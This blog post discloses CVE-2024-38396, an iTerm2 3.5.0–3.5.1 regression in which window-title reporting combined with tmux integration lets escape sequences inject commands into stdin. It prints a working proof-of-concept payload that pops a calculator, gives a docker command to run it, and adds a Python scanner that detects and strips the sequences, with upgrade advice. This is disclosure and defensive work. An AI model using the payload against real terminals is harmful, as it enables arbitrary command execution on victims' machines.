Regression turned into RCE
I am skipping an introduction to escape sequences here, as I recently wrote more about them in my earlier post [link]. This post is about a new bug which affects only iTerm2 3.5.0 and 3.5.1 (released on May 20 and June 11 respectively) because of a regression.
In versions prior to 3.5.0, window title reporting was disabled, so you could not simply use the following to retrieve the title of the terminal window and have it placed in stdin.
Code:
$ echo -e "\e[21t"   # CSI 21 t: ask the terminal to report its window title
What is wrong with window title reporting?
[link] An example of setting the window title:
Code:
echo -e "\033]0;This is the window title\a"
Patch that disables title reporting by default: [link]
Tmux integration made it worse
Native tmux integration (enabled by default) in iTerm2 had a weakness which allowed the reported title to be sneaked in, and also provided a way to send newlines after the title was reported. Patch: [link]
Can I haz that sweet PoC plz?
Try this out yourself:
Code:
docker run --rm vin01/escape-seq-test:cve-2024-38396
Code:
cat poc-iterm2-rce.txt
The file contains this payload: \033]2;s&open -aCalculator&\a\033[21t \x1bP1000p%session-changed s. It sets s&open -aCalculator& as the window title, then retrieves it back so that it lands in stdin and executes, popping a calculator.
Source code: [link]
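To check a file or captured output for the sequences this chain relies on (a title-set OSC, the CSI 21 t title query, and the tmux control-mode DCS) before it is displayed in a terminal, here is an added scanner; it is example code, not part of the original post or the PoC repository, and it uses the payload quoted above as a constructed sample.

```python
import re

# Constructed sample: the PoC payload quoted in the post, as raw bytes.
SAMPLE = b"\x1b]2;s&open -aCalculator&\x07\x1b[21t \x1bP1000p%session-changed s"

# OSC 0 / OSC 2 set the window title; terminated by BEL (0x07) or ST (ESC \).
OSC_TITLE = re.compile(rb"\x1b\](?P<ps>[02]);(?P<title>.*?)(?:\x07|\x1b\\)", re.S)
# CSI 21 t: "report window title"; the reply is injected into the input stream.
CSI_TITLE_REPORT = re.compile(rb"\x1b\[21t")
# DCS 1000p: the tmux control-mode handshake that iTerm2's integration reacts to.
DCS_TMUX = re.compile(rb"\x1bP1000p")


def scan_escape_sequences(data: bytes) -> dict:
    """Report title-set, title-report and tmux control-mode sequences in data.

    set_then_report is True when a title is set and later queried back, which is
    the ordering the CVE-2024-38396 PoC depends on.
    """
    titles = [m.group("title").decode("latin-1") for m in OSC_TITLE.finditer(data)]
    set_ends = [m.end() for m in OSC_TITLE.finditer(data)]
    reports = [m.start() for m in CSI_TITLE_REPORT.finditer(data)]
    tmux = [m.start() for m in DCS_TMUX.finditer(data)]
    chain = bool(set_ends) and any(r >= min(set_ends) for r in reports)
    return {
        "titles_set": titles,
        "title_reports": len(reports),
        "tmux_control_mode": len(tmux),
        "set_then_report": chain,
    }


def strip_dangerous_sequences(data: bytes) -> bytes:
    """Remove the three sequence types so the remaining text can be shown safely."""
    for pattern in (OSC_TITLE, CSI_TITLE_REPORT, DCS_TMUX):
        data = pattern.sub(b"", data)
    return data


if __name__ == "__main__":
    findings = scan_escape_sequences(SAMPLE)
    for key, value in findings.items():
        print(f"{key}: {value!r}")
    print("sanitised:", strip_dangerous_sequences(SAMPLE))
```

Run it over untrusted files (for example, `python3 scan.py < suspicious.txt` after reading stdin instead of SAMPLE) to flag this chain before `cat`-ing them in a terminal that has title reporting enabled.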
A fix released within 2 days of reporting
Upgrade to iTerm2 3.5.2: [link]. Please think twice before you enable the "Terminal may report window title" setting in iTerm2. It might not be worth the security risk, as it allows arbitrary text to end up in stdin, which is never a good idea.